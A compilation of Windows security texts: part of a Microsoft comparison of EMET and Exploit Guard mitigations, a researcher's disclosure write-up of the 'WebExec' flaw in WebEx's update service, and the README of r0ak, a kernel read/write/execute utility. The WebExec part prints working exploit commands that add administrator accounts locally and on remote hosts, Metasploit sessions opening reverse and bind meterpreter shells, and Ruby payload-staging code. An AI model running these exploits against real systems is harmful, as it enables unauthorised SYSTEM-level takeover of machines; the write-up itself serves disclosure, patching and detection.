  • Microsoft Intune – Windows Defender Exploit Guard: use Intune to customize, deploy, and manage configurations. EMET: not available.
  • Reporting – Windows Defender Exploit Guard: Windows event logs and full audit mode reporting; full integration with Windows Defender Advanced Threat Protection. EMET: limited Windows event log monitoring.
  • Audit mode – Windows Defender Exploit Guard: full audit mode with Windows event reporting. EMET: limited to EAF, EAF+, and anti-ROP mitigations.

(1) Requires an enterprise subscription with Azure Active Directory or a Software Assurance ID.

(2) Additional requirements may apply (such as use of Windows Defender Antivirus). See Windows Defender Exploit Guard requirements for more details. Customizable mitigation options that are configured with Exploit protection do not require Windows Defender Antivirus.

Mitigation comparison

The mitigations available in EMET are included in Windows Defender Exploit Guard, under the exploit protection feature.
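
For instance, a hedged sketch of inspecting and enabling a few of those mitigations for a single process with the built-in PowerShell cmdlets; the process name and the chosen mitigations are examples only:

PS C:\> Get-ProcessMitigation -Name notepad.exe
PS C:\> Set-ProcessMitigation -Name notepad.exe -Enable DEP,SEHOP,ForceRelocateImages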

This section lists the native mitigations covered by EMET and by Exploit protection.

  • Arbitrary code guard (ACG) – known in EMET as “Memory Protection Check”
  • Block remote images – known in EMET as “Load Library Check”
  • Block untrusted fonts
  • Data Execution Prevention (DEP)
  • Export address filtering (EAF)
  • Force randomization for images (Mandatory ASLR)
  • NullPage Security Mitigation – included natively in Windows 10; see Mitigate threats by using Windows 10 security features for more information
  • Randomize memory allocations (Bottom-Up ASLR)
  • Simulate execution (SimExec)
  • Validate API invocation (CallerCheck)
  • Validate exception chains (SEHOP)
  • Validate stack integrity (StackPivot)
  • Certificate trust (configurable certificate pinning) – Windows 10 provides enterprise certificate pinning
  • Heap spray allocation – ineffective against newer browser-based exploits; newer mitigations provide better protection; see Mitigate threats by using Windows 10 security features for more information
  • Block low integrity images
  • Code integrity guard
  • Disable extension points
  • Disable Win32k system calls
  • Do not allow child processes
  • Import address filtering (IAF)
  • Validate handle usage
  • Validate heap integrity
  • Validate image dependency integrity

 Note

The Advanced ROP mitigations that are available in EMET are superseded by ACG in Windows 10, while other EMET advanced settings are enabled by default in Windows Defender Exploit Guard as part of enabling the anti-ROP mitigations for a process.

See Mitigate threats by using Windows 10 security features for more information on how Windows 10 employs existing EMET technology.

Technical Rundown of WebExec

This is a technical rundown of a vulnerability that we’ve dubbed «WebExec».

The summary is: a flaw in WebEx’s WebexUpdateService allows anyone with a login to the Windows system where WebEx is installed to run SYSTEM-level code remotely. That’s right: this client-side application that doesn’t listen on any ports is actually vulnerable to remote code execution! A local or domain account will work, making this a powerful way to pivot through networks until it’s patched.

High level details and FAQ at https://webexec.org! Below is a technical writeup of how we found the bug and how it works.

Credit

This vulnerability was discovered by myself and Jeff McJunkin from Counter Hack during a routine pentest. Thanks to Ed Skoudis for permission to post this writeup.

If you have any questions or concerns, I made an email alias specifically for this issue: info@webexec.org!

You can download a vulnerable installer here and a patched one here, in case you want to play with this yourself! It probably goes without saying, but be careful if you run the vulnerable version!

Intro

During a recent pentest, we found an interesting vulnerability in the WebEx client software while we were trying to escalate local privileges on an end-user laptop. Eventually, we realized that this vulnerability is also exploitable remotely (given any domain user account) and decided to give it a name: WebExec. Because every good vulnerability has a name!

As far as we know, a remote attack against a 3rd party Windows service is a novel type of attack. We’re calling the class «thank you for your service», because we can, and are crossing our fingers that more are out there!

The affected version of WebEx is the latest client build as of August 2018: version 3211.0.1801.2200, modified 7/19/2018, SHA1: bf8df54e2f49d06b52388332938f5a875c43a5a7. We’ve tested some older and newer versions since then, and they are still vulnerable.
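
If you want to check which build a host is running, one hedged way (the path matches the install location referenced later in this post; output will vary) is to query the file version of the service binary:

C:\>wmic datafile where name="C:\\ProgramData\\Webex\\Webex\\Applications\\WebExService.exe" get Version

On the vulnerable build described here, this reports 3211.0.1801.2200.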

WebEx released a patch on October 3, but requested that we maintain the embargo until they released their advisory. You can find all the patching instructions on webexec.org.

The good news is, the patched version of this service will only run files that are signed by WebEx. The bad news is, there are a lot of those out there (including the vulnerable version of the service!), and the service can still be started remotely. If you’re concerned about the service being remotely start-able by any user (which you should be!), the following command disables that function:

c:\>sc sdset webexservice D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPLORC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

That removes remote and non-interactive access from the service. It will still be vulnerable to local privilege escalation, though, without the patch.

Privilege Escalation

What initially got our attention is that the folder (c:\ProgramData\WebEx\WebEx\Applications\) is readable and writable by everyone, and it installs a service called «webexservice» that can be started and stopped by anybody. That’s not good! It is trivial to replace the .exe or an associated .dll with anything we like, and get code execution at the service level (that’s SYSTEM). That’s an immediate vulnerability, which we reported, and which ZDI apparently beat us to the punch on, since it was fixed on September 5, 2018, based on their report.
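
If you want to check a system for the same conditions, a quick sketch using only built-in tools (output omitted):

C:\>icacls "c:\ProgramData\WebEx\WebEx\Applications"
C:\>sc sdshow webexservice

The first command dumps the folder ACL, where the write access for everyone shows up; the second dumps the service’s security descriptor, which is what lets any user start and stop it (and is what the sc sdset command above locks down).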

Due to the application whitelisting, however, on this particular assessment we couldn’t simply replace this with a shell! The service starts non-interactively (ie, no window and no commandline arguments). We explored a lot of different options, such as replacing the .exe with other binaries (such as cmd.exe), but no GUI meant no ability to run commands.

One test that almost worked was replacing the .exe with another whitelisted application, msbuild.exe, which can read arbitrary C# commands out of a .vbproj file in the same directory. But because it’s a service, it runs with the working directory c:\windows\system32, and we couldn’t write to that folder!

At that point, my curiosity got the best of me, and I decided to look into what webexservice.exe actually does under the hood. The deep dive ended up finding gold! Let’s take a look.

Deep dive into WebExService.exe

It’s not really a good motto, but when in doubt, I tend to open something in IDA. The two easiest ways to figure out what a process does in IDA are the strings window (Shift-F12) and the imports window. In the case of webexservice.exe, most of the strings were related to Windows service stuff, but something caught my eye:

  .rdata:00405438 ; wchar_t aSCreateprocess
  .rdata:00405438 aSCreateprocess:                        ; DATA XREF: sub_4025A0+1E8o
  .rdata:00405438                 unicode 0, <%s::CreateProcessAsUser:%d;%ls;%ls(%d).>,0

I found the import for CreateProcessAsUserW in advapi32.dll, and looked at how it was called:

  .text:0040254E                 push    [ebp+lpProcessInformation] ; lpProcessInformation
  .text:00402554                 push    [ebp+lpStartupInfo] ; lpStartupInfo
  .text:0040255A                 push    0               ; lpCurrentDirectory
  .text:0040255C                 push    0               ; lpEnvironment
  .text:0040255E                 push    0               ; dwCreationFlags
  .text:00402560                 push    0               ; bInheritHandles
  .text:00402562                 push    0               ; lpThreadAttributes
  .text:00402564                 push    0               ; lpProcessAttributes
  .text:00402566                 push    [ebp+lpCommandLine] ; lpCommandLine
  .text:0040256C                 push    0               ; lpApplicationName
  .text:0040256E                 push    [ebp+phNewToken] ; hToken
  .text:00402574                 call    ds:CreateProcessAsUserW

The W on the end refers to the UNICODE («wide») version of the function. When developing Windows code, developers typically use CreateProcessAsUser in their code, and the compiler expands it to CreateProcessAsUserA for ASCII, and CreateProcessAsUserW for UNICODE. If you look up the function definition for CreateProcessAsUser, you’ll find everything you need to know.

In any case, the two most important arguments here are hToken — the user it creates the process as — and lpCommandLine — the command that it actually runs. Let’s take a look at each!

hToken

The code behind hToken is actually pretty simple. If we scroll up in the same function that calls CreateProcessAsUserW, we can just look at API calls to get a feel for what’s going on. Trying to understand what code’s doing simply based on the sequence of API calls tends to work fairly well in Windows applications, as you’ll see shortly.

At the top of the function, we see:

  .text:0040241E                 call    ds:CreateToolhelp32Snapshot

This is a normal way to search for a specific process in Win32 — it creates a «snapshot» of the running processes and then typically walks through them using Process32FirstW and Process32NextW until it finds the one it needs. I even used the exact same technique a long time ago when I wrote my Injector tool for loading a custom .dll into another process (sorry for the bad code.. I wrote it like 15 years ago).

Based simply on knowledge of the APIs, we can deduce that it’s searching for a specific process. If we keep scrolling down, we can find a call to _wcsicmp, which is a Microsoft way of saying stricmp for UNICODE strings:

  .text:00402480                 lea     eax, [ebp+Str1]
  .text:00402486                 push    offset Str2     ; "winlogon.exe"
  .text:0040248B                 push    eax             ; Str1
  .text:0040248C                 call    ds:_wcsicmp
  .text:00402492                 add     esp, 8
  .text:00402495                 test    eax, eax
  .text:00402497                 jnz     short loc_4024BE

Specifically, it’s comparing the name of each process to «winlogon.exe» — so it’s trying to get a handle to the «winlogon.exe» process!

If we continue down the function, you’ll see that it calls OpenProcess, then OpenProcessToken, then DuplicateTokenEx. That’s another common sequence of API calls — it’s how a process can get a handle to another process’s token. Shortly after, the token it duplicates is passed to CreateProcessAsUserW as hToken.

To summarize: this function gets a handle to winlogon.exe, duplicates its token, and creates a new process as the same user (SYSTEM). Now all we need to do is figure out what the process is!

An interesting takeaway here is that I didn’t really really read assembly at all to determine any of this: I simply followed the API calls. Often, reversing Windows applications is just that easy!

lpCommandLine

This is where things get a little more complicated, since there are a series of function calls to traverse to figure out lpCommandLine. I had to use a combination of reversing, debugging, troubleshooting, and eventlogs to figure out exactly where lpCommandLine comes from. This took a good full day, so don’t be discouraged by this quick summary — I’m skipping an awful lot of dead ends and validation to keep just to the interesting bits.

One such dead end: I initially started by working backwards from CreateProcessAsUserW, or forwards from main(), but I quickly became lost in the weeds and decided that I’d have to go the other route. While scrolling around, however, I noticed a lot of debug strings and calls to the event log. That gave me an idea — I opened the Windows event viewer (eventvwr.msc) and tried to start the process with sc start webexservice:

C:\Users\ron>sc start webexservice

SERVICE_NAME: webexservice
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
[...]

You may need to configure Event Viewer to show everything in the Application logs, I didn’t really know what I was doing, but eventually I found a log entry for WebExService.exe:

  ExecuteServiceCommand::Not enough command line arguments to execute a service command.

That’s handy! Let’s search for that in IDA (alt+T)! That leads us to this code:

  .text:004027DC                 cmp     edi, 3
  .text:004027DF                 jge     short loc_4027FD
  .text:004027E1                 push    offset aExecuteservice ; "ExecuteServiceCommand"
  .text:004027E6                 push    offset aSNotEnoughComm ; "%s::Not enough command line arguments t"...
  .text:004027EB                 push    2               ; wType
  .text:004027ED                 call    sub_401770

A tiny bit of actual reversing: compare edi to 3, jump if greater or equal, otherwise print that we need more commandline arguments. It doesn’t take a huge logical leap to determine that we need 2 or more commandline arguments (since the name of the process is always counted as well). Let’s try it:

C:\Users\ron>sc start webexservice a b

[...]

Then check Event Viewer again:

  ExecuteServiceCommand::Service command not recognized: b.

Don’t you love verbose error messages? It’s like we don’t even have to think! Once again, search for that string in IDA (alt+T) and we find ourselves here:

  .text:00402830 loc_402830:                             ; CODE XREF: sub_4027D0+3Dj
  .text:00402830                 push    dword ptr [esi+8]
  .text:00402833                 push    offset aExecuteservice ; "ExecuteServiceCommand"
  .text:00402838                 push    offset aSServiceComman ; "%s::Service command not recognized: %ls"...
  .text:0040283D                 push    2               ; wType
  .text:0040283F                 call    sub_401770

If we scroll up just a bit to determine how we get to that error message, we find this:

  .text:004027FD loc_4027FD:                             ; CODE XREF: sub_4027D0+Fj
  .text:004027FD                 push    offset aSoftwareUpdate ; "software-update"
  .text:00402802                 push    dword ptr [esi+8] ; lpString1
  .text:00402805                 call    ds:lstrcmpiW
  .text:0040280B                 test    eax, eax
  .text:0040280D                 jnz     short loc_402830 ; <-- Jumps to the error we saw
  .text:0040280F                 mov     [ebp+var_4], eax
  .text:00402812                 lea     edx, [esi+0Ch]
  .text:00402815                 lea     eax, [ebp+var_4]
  .text:00402818                 push    eax
  .text:00402819                 push    ecx
  .text:0040281A                 lea     ecx, [edi-3]
  .text:0040281D                 call    sub_4025A0

The string software-update is what the argument is compared against. So instead of b, let’s try software-update and see if that gets us further! I want to once again point out that we’re doing only an absolute minimum of reverse engineering at the assembly level — we’re basically entirely using API calls and error messages!

Here’s our new command:

C:\Users\ron>sc start webexservice a software-update

[...]

Which results in the new log entry:

  Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Faulting module name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Exception code: 0xc0000005
  Fault offset: 0x00002643
  Faulting process id: 0x654
  Faulting application start time: 0x01d42dbbf2bcc9b8
  Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Faulting module path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Report Id: 31555e60-99af-11e8-8391-0800271677bd

Uh oh! I’m normally excited when I get a process to crash, but this time I’m actually trying to use its features! What do we do!?

First of all, we can look at the exception code: 0xc0000005. If you Google it, or develop low-level software, you’ll know that it’s a memory fault. The process tried to access a bad memory address (likely NULL, though I never verified).

The first thing I tried was the brute-force approach: let’s add more commandline arguments! My logic was that it might require 2 arguments, but actually use the third and onwards for something then crash when they aren’t present.

So I started the service with the following commandline:

C:\Users\ron>sc start webexservice a software-update a b c d e f

[...]

That led to a new crash, so progress!

  Faulting application name: WebExService.exe, version: 3211.0.1801.2200, time stamp: 0x5b514fe3
  Faulting module name: MSVCR120.dll, version: 12.0.21005.1, time stamp: 0x524f7ce6
  Exception code: 0x40000015
  Fault offset: 0x000a7676
  Faulting process id: 0x774
  Faulting application start time: 0x01d42dbc22eef30e
  Faulting application path: C:\ProgramData\Webex\Webex\Applications\WebExService.exe
  Faulting module path: C:\ProgramData\Webex\Webex\Applications\MSVCR120.dll
  Report Id: 60a0439c-99af-11e8-8391-0800271677bd

I had to google 0x40000015; it means STATUS_FATAL_APP_EXIT. In other words, the app exited, but hard — probably a failed assert()? We don’t really have any output, so it’s hard to say.

This one took me a while, and this is where I’ll skip the dead ends and debugging and show you what worked.

Basically, keep following the codepath immediately after the software-update string we saw earlier. Not too far after, you’ll see this function call:

  .text:0040281D                 call    sub_4025A0

If you jump into that function (double click), and scroll down a bit, you’ll see:

  .text:00402616                 mov     [esp+0B4h+var_70], offset aWinsta0Default ; "winsta0\\Default"

I used the most advanced technique in my arsenal here and googled that string. It turns out that it’s a handle to the default desktop and is frequently used when starting a new process that needs to interact with the user. That’s a great sign, it means we’re almost there!

A little bit after, in the same function, we see this code:

  .text:004026A2                 push    eax             ; EndPtr
  .text:004026A3                 push    esi             ; Str
  .text:004026A4                 call    ds:wcstod ; <--
  .text:004026AA                 add     esp, 8
  .text:004026AD                 fstp    [esp+0B4h+var_90]
  .text:004026B1                 cmp     esi, [esp+0B4h+EndPtr+4]
  .text:004026B5                 jnz     short loc_4026C2
  .text:004026B7                 push    offset aInvalidStodArg ; "invalid stod argument"
  .text:004026BC                 call    ds:?_Xinvalid_argument@std@@YAXPBD@Z ; std::_Xinvalid_argument(char const *)

The line marked with an arrow, the call to wcstod(), is close to where the abort() happened. I’ll spare you the debugging details — debugging a service was non-trivial — but I really should have seen that function call before I got off track.

I looked up wcstod() online, and it’s another of Microsoft’s cleverly named functions. This one converts a string to a number. If it fails, the code references something called std::_Xinvalid_argument. I don’t know exactly what it does from there, but we can assume that it’s looking for a number somewhere.

This is where my advice becomes «be lucky». The reason is, the only number that will actually work here is «1». I don’t know why, or what other numbers do, but I ended up calling the service with the commandline:

C:\Users\ron>sc start webexservice a software-update 1 2 3 4 5 6

And checked the event log:

  StartUpdateProcess::CreateProcessAsUser:1;1;2 3 4 5 6(18).

That looks awfully promising! I changed 2 to an actual process:

  C:\Users\ron>sc start webexservice a software-update 1 calc c d e f

And it opened!

C:\Users\ron>tasklist | find "calc"
calc.exe                      1476 Console                    1     10,804 K

It actually runs with a GUI, too, so that’s kind of unnecessary. I could literally see it! And it’s running as SYSTEM!

Speaking of unknowns, running cmd.exe and powershell the same way does not appear to work. We can, however, run wmic.exe and net.exe, so we have some choices!

Local exploit

The simplest exploit is to start cmd.exe with wmic.exe:

C:\Users\ron>sc start webexservice a software-update 1 wmic process call create "cmd.exe"

That opens a GUI cmd.exe instance as SYSTEM:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

If we can’t or choose not to open a GUI, we can also escalate privileges:

C:\Users\ron>net localgroup administrators
[...]
Administrator
ron

C:\Users\ron>sc start webexservice a software-update 1 net localgroup administrators testuser /add
[...]

C:\Users\ron>net localgroup administrators
[...]
Administrator
ron
testuser

And this all works as an unprivileged user!

Jeff wrote a local module for Metasploit to exploit the privilege escalation vulnerability. If you have a non-SYSTEM session on the affected machine, you can use it to gain a SYSTEM account:

meterpreter > getuid
Server username: IEWIN7\IEUser

meterpreter > background
[*] Backgrounding session 2...

msf exploit(multi/handler) > use exploit/windows/local/webexec
msf exploit(windows/local/webexec) > set SESSION 2
SESSION => 2

msf exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/local/webexec) > set LHOST 172.16.222.1
msf exploit(windows/local/webexec) > set LPORT 9001
msf exploit(windows/local/webexec) > run

[*] Started reverse TCP handler on 172.16.222.1:9001
[*] Checking service exists...
[*] Writing 73802 bytes to %SystemRoot%\Temp\yqaKLvdn.exe...
[*] Launching service...
[*] Sending stage (179779 bytes) to 172.16.222.132
[*] Meterpreter session 2 opened (172.16.222.1:9001 -> 172.16.222.132:49574) at 2018-08-31 14:45:25 -0700
[*] Service started...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Remote exploit

We actually spent over a week knowing about this vulnerability without realizing that it could be used remotely! The simplest exploit can still be done with the Windows sc command. Either create a session to the remote machine or create a local user with the same credentials, then run cmd.exe in the context of that user (runas /user:newuser cmd.exe). Once that’s done, you can use the exact same command against the remote host:

c:\>sc \\10.0.0.0 start webexservice a software-update 1 net localgroup administrators testuser /add

The command will run (and a GUI will even pop up!) on the other machine.

Remote exploitation with Metasploit

To simplify this attack, I wrote a pair of Metasploit modules. One is an auxiliary module that implements this attack to run an arbitrary command remotely, and the other is a full exploit module. Both require a valid SMB account (local or domain), and both mostly depend on the WebExec library that I wrote.

Here is an example of using the auxiliary module to run calc on a bunch of vulnerable machines:

msf5 > use auxiliary/admin/smb/webexec_command
msf5 auxiliary(admin/smb/webexec_command) > set RHOSTS 192.168.56.100-110
RHOSTS => 192.168.56.100-110
msf5 auxiliary(admin/smb/webexec_command) > set SMBUser testuser
SMBUser => testuser
msf5 auxiliary(admin/smb/webexec_command) > set SMBPass testuser
SMBPass => testuser
msf5 auxiliary(admin/smb/webexec_command) > set COMMAND calc
COMMAND => calc
msf5 auxiliary(admin/smb/webexec_command) > exploit

[-] 192.168.56.105:445    - No service handle retrieved
[+] 192.168.56.105:445    - Command completed!
[-] 192.168.56.103:445    - No service handle retrieved
[+] 192.168.56.103:445    - Command completed!
[+] 192.168.56.104:445    - Command completed!
[+] 192.168.56.101:445    - Command completed!
[*] 192.168.56.100-110:445 - Scanned 11 of 11 hosts (100% complete)
[*] Auxiliary module execution completed

And here’s the full exploit module:

msf5 > use exploit/windows/smb/webexec
msf5 exploit(windows/smb/webexec) > set SMBUser testuser
SMBUser => testuser
msf5 exploit(windows/smb/webexec) > set SMBPass testuser
SMBPass => testuser
msf5 exploit(windows/smb/webexec) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/webexec) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf5 exploit(windows/smb/webexec) > exploit

[*] 192.168.56.101:445 - Connecting to the server...
[*] 192.168.56.101:445 - Authenticating to 192.168.56.101:445 as user 'testuser'...
[*] 192.168.56.101:445 - Command Stager progress -   0.96% done (999/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress -   1.91% done (1998/104435 bytes)
...
[*] 192.168.56.101:445 - Command Stager progress -  98.52% done (102891/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress -  99.47% done (103880/104435 bytes)
[*] 192.168.56.101:445 - Command Stager progress - 100.00% done (104435/104435 bytes)
[*] Started bind TCP handler against 192.168.56.101:4444
[*] Sending stage (179779 bytes) to 192.168.56.101

The actual implementation is mostly straightforward if you look at the code linked above, but I wanted to specifically talk about the exploit module, since it had an interesting problem: how do you initially get a meterpreter .exe uploaded so you can execute it?

I started by using a psexec-like exploit where we upload the .exe file to a writable share, then execute it via WebExec. That proved problematic, because uploading to a share frequently requires administrator privileges, and at that point you could simply use psexec instead. You lose the magic of WebExec!

After some discussion with Egyp7, I realized I could use the Msf::Exploit::CmdStager mixin to stage a payload .exe onto the filesystem through a series of commands. Using the .vbs flavor of staging, it would write a Base64-encoded file to disk, then a .vbs stub to decode and execute it!

There are several problems, however:

  • The max line length is ~1200 characters, whereas the CmdStager mixin uses ~2000 characters per line
  • CmdStager uses %TEMP% as a temporary directory, but our exploit doesn’t expand paths
  • WebExecService seems to escape quotation marks with a backslash, and I’m not sure how to turn that off

The first two issues could be simply worked around by adding options (once I’d figured out the options to use):

wexec(true) do |opts|
  opts[:flavor] = :vbs
  opts[:linemax] = datastore["MAX_LINE_LENGTH"]
  opts[:temp] = datastore["TMPDIR"]
  opts[:delay] = 0.05
  execute_cmdstager(opts)
end

execute_cmdstager() will execute execute_command() over and over to build the payload on-disk, which is where we fix the final issue:

# This is the callback for cmdstager, which breaks the full command into
# chunks and sends it our way. We have to do a bit of finagling to make it
# work correctly
def execute_command(command, opts)
  # Replace the empty string, "", with a workaround - the first 0 characters of "A"
  command = command.gsub('""', 'mid(Chr(65), 1, 0)')

  # Replace quoted strings with Chr(XX) versions, in a naive way
  command = command.gsub(/"[^"]*"/) do |capture|
    capture.gsub(/"/, "").chars.map do |c|
      "Chr(#{c.ord})"
    end.join('+')
  end

  # Prepend "cmd /c" so we can use a redirect
  command = "cmd /c " + command

  execute_single_command(command, opts)
end

First, it replaces the empty string with mid(Chr(65), 1, 0), which works out to the first zero characters of the string "A", i.e. the empty string!

Second, it replaces every other string with Chr(n)+Chr(n)+.... We couldn’t use &, because that’s already used by the shell to chain commands. I later learned that we can escape it and use ^&, which works just fine, but + is shorter so I stuck with that.

And finally, we prepend cmd /c to the command, which lets us echo to a file instead of just passing the > symbol to the process. We could probably use ^> instead.
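To make the transformation concrete, here is a small standalone Ruby sketch of the same substitutions applied to a made-up command (the command string itself is purely illustrative):

# Standalone sketch of the callback's substitutions; the command is made up.
command = 'echo "hi" > "f.txt" & echo ""'

# Empty strings become a zero-length slice of "A"
command = command.gsub('""', 'mid(Chr(65), 1, 0)')

# Remaining quoted strings become Chr(n)+Chr(n)+... concatenations
command = command.gsub(/"[^"]*"/) do |capture|
  capture.gsub(/"/, "").chars.map { |c| "Chr(#{c.ord})" }.join('+')
end

# Prepend cmd /c so the > redirect is handled by a fresh shell
command = "cmd /c " + command

puts command
# => cmd /c echo Chr(104)+Chr(105) > Chr(102)+Chr(46)+Chr(116)+Chr(120)+Chr(116) & echo mid(Chr(65), 1, 0)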

In a targeted attack, it’s obviously possible to do this much more cleanly, but this seems to be a great way to do it generically!

Checking for the patch

This is one of those rare (or maybe not so rare?) instances where exploiting the vulnerability is actually easier than checking for it!

The patched version of WebEx still allows remote users to connect to the process and start it. However, if the process detects that it’s being asked to run an executable that is not signed by WebEx, the execution will halt. Unfortunately, that gives us no information about whether a host is vulnerable!

There are a lot of targeted ways we could validate whether code was run. We could use a DNS request, telnet back to a specific port, drop a file in the webroot, etc. The problem is that unless we have a generic way to check, it’s no good as a script!

In order to exploit this, you have to be able to get a handle to the service-control service (svcctl), so to write a checker, I decided to install a fake service, try to start it, then delete the service. If starting the service returns either OK or ACCESS_DENIED, we know it worked!

Here’s the important code from the Nmap checker module we developed:

-- Create a test service that we can query
local webexec_command = "sc create " .. test_service .. " binpath= c:\\fakepath.exe"
status, result = msrpc.svcctl_startservicew(smbstate, open_service_result['handle'], stdnse.strsplit(" ", "install software-update 1 " .. webexec_command))

-- ...

local test_status, test_result = msrpc.svcctl_openservicew(smbstate, open_result['handle'], test_service, 0x00000)

-- If the service DOES_NOT_EXIST, we couldn't run code
if string.match(test_result, 'DOES_NOT_EXIST') then
  stdnse.debug("Result: Test service does not exist: probably not vulnerable")
  msrpc.svcctl_closeservicehandle(smbstate, open_result['handle'])

  vuln.check_results = "Could not execute code via WebExService"
  return report:make_output(vuln)
end

Not shown: we also delete the service once we’re finished.

Conclusion

So there you have it! Escalating privileges from zero to SYSTEM using WebEx’s built-in update service! Local and remote! Check out webexec.org for tools and usage instructions!

R0Ak (The Ring 0 Army Knife) — A Command Line Utility To Read/Write/Execute Ring Zero On Windows 10 Systems

r0ak is a Windows command-line utility that enables you to easily read, write, and execute kernel-mode code (with some limitations) from the command prompt, without requiring anything else other than Administrator privileges.

Quick Peek


r0ak v1.0.0 -- Ring 0 Army Knife
http://www.github.com/ionescu007/r0ak
Copyright (c) 2018 Alex Ionescu [@aionescu]
http://www.windows-internals.com

USAGE: r0ak.exe
       [--execute <Address | module.ext!function> <Argument>]
       [--write   <Address | module.ext!function> <Value>]
       [--read    <Address | module.ext!function> <Size>]

Introduction

Motivation
The Windows kernel is a rich environment in which hundreds of drivers execute on a typical system, and where thousands of variables containing global state are present. For advanced troubleshooting, IT experts will typically use tools such as the Windows Debugger (WinDbg) and the Sysinternals tools, or write their own. Unfortunately, usage of these tools is getting increasingly hard, and they are themselves limited by their own access to Windows APIs and exposed features.
Some of today’s challenges include:

  • Windows 8 and later support Secure Boot, which prevents kernel debugging (including local debugging) and loading of test-signed driver code. This restricts troubleshooting tools to those that have a signed kernel-mode driver.
  • Even on systems without Secure Boot enabled, enabling local debugging or changing boot options which ease debugging capabilities will often trigger BitLocker’s recovery mode.
  • Windows 10 Anniversary Update and later include much stricter driver signature requirements, which now enforce Microsoft EV Attestation Signing. This restricts the freedom of software developers, as generic "read-write-everything" drivers are frowned upon.
  • Windows 10 Spring Update now includes customer-facing options for enabling Hypervisor-protected Code Integrity (HVCI), which further restricts allowable drivers and blacklists multiple 3rd party drivers that had "read-write-everything" capabilities due to poorly written interfaces and security risks.
  • Technologies like Supervisor Mode Execution Prevention (SMEP), Kernel Control Flow Guard (KCFG) and HVCI with Second Level Address Translation (SLAT) are making traditional Ring 0 execution 'tricks' obsolete, so a new approach is needed.

In such an environment, it was clear that a simple tool, one which can be used as an emergency band-aid/hotfix to quickly troubleshoot kernel- or system-level issues that may be apparent by analyzing kernel state, might be valuable to the community.

How it Works

Basic Architecture

r0ak works by redirecting the execution flow of the window manager's trusted font validation checks when attempting to load a new font, by replacing the trusted font table's comparator routine with an alternate function which schedules an executive work item (WORK_QUEUE_ITEM) stored in the input node. Then, the trusted font table's right child (which serves as the root node) is overwritten with a named pipe's write buffer (NP_DATA_ENTRY) in which a custom work item is stored. This item's underlying worker function and its parameter are what will eventually be executed by a dedicated ExpWorkerThread at PASSIVE_LEVEL once a font load is attempted and the comparator routine executes, receiving the named pipe-backed parent node as its input. A real-time Event Tracing for Windows (ETW) trace event is used to receive an asynchronous notification that the work item has finished executing, which makes it safe to tear down the structures, free the kernel-mode buffers, and restore normal operation.

Supported Commands
When using the --execute option, this function and parameter are supplied by the user.
When using --write, a custom gadget is used to modify arbitrary 32-bit values anywhere in kernel memory.
When using --read, the write gadget is used to modify the system's HSTI buffer pointer and size (N.B.: this is destructive behavior in terms of any other applications that will request the HSTI data; as this is optional Windows behavior, and this tool is meant for emergency debugging/experimentation, this loss of data was considered acceptable). Then, the HSTI Query API is used to copy the data back into the tool's user-mode address space, and a hex dump is shown.
Because only built-in, Microsoft-signed Windows functionality is used, and all called functions are part of the KCFG bitmap, there is no violation of any security checks, no debugging flags are required, and no poorly written 3rd party drivers are involved.

FAQ

Is this a bug/vulnerability in Windows?
No. Since this tool — and the underlying technique — require a SYSTEM-level privileged token, which can only be obtained by a user running under the Administrator account, no security boundaries are being bypassed in order to achieve the effect. The behavior and utility of the tool are only possible due to the elevated/privileged security context of the Administrator account on Windows, and this is understood to be by-design behavior.

Was Microsoft notified about this behavior?
Of course! It’s important to always file security issues with Microsoft even when no violation of privileged boundaries seems to have occurred — their teams of researchers and developers might find novel vectors and ways to reach certain code paths which an external researcher may not have thought of.
As such, in November 2014, a security case was filed with the Microsoft Security Response Center (MSRC), which responded: "[…] doesn't fall into the scope of a security issue we would address via our traditional Security Bulletin vehicle. It […] pre-supposes admin privileges — a place where architecturally, we do not currently define a defensible security boundary. As such, we won't be pursuing this to fix."
Furthermore, in April 2015 at the Infiltrate conference, a talk titled Insection: AWEsomely Exploiting Shared Memory Objects was presented detailing this issue, including to Microsoft developers in attendance, who agreed this was currently out of scope of Windows's architectural security boundaries. This is because there are literally dozens — if not more — of other ways an Administrator can read/write/execute Ring 0 memory. This tool merely allows an easy commodification of one such vector, for purposes of debugging and troubleshooting system issues.

Can’t this be packaged up as part of end-to-end attack/exploit kit?
Packaging this code up as a library would require carefully removing all interactive command-line parsing and standard output, at which point, without major rewrites, the ‘kit’ would:

  • Require the target machine to be running Windows 10 Anniversary Update x64 or later
  • Have already elevated privileges to SYSTEM
  • Require an active Internet connection with a proxy/firewall allowing access to Microsoft’s Symbol Server
  • Require the Windows SDK/WDK installed on the target machine
  • Require a sensible _NT_SYMBOL_PATH environment variable to have been configured on the target machine, and for about 15MB of symbol data to be downloaded and cached as PDB files somewhere on the disk

Attackers interested in using this particular approach — versus the many more cross-compatible techniques that don't require SYSTEM rights — have likely already adapted their own code based on the Proof-of-Concept from April 2015, more than 3 years ago.

Usage

Requirements
Due to the usage of the Windows Symbol Engine, you must have either the Windows Software Development Kit (SDK) or Windows Driver Kit (WDK) installed with the Debugging Tools for Windows. The tool will look up your installation path automatically and leverage the DbgHelp.dll and SymSrv.dll that are present in that directory. As these files are not re-distributable, they cannot be included with the release of the tool.
Alternatively, if you obtain these libraries on your own, you can modify the source code to use them.
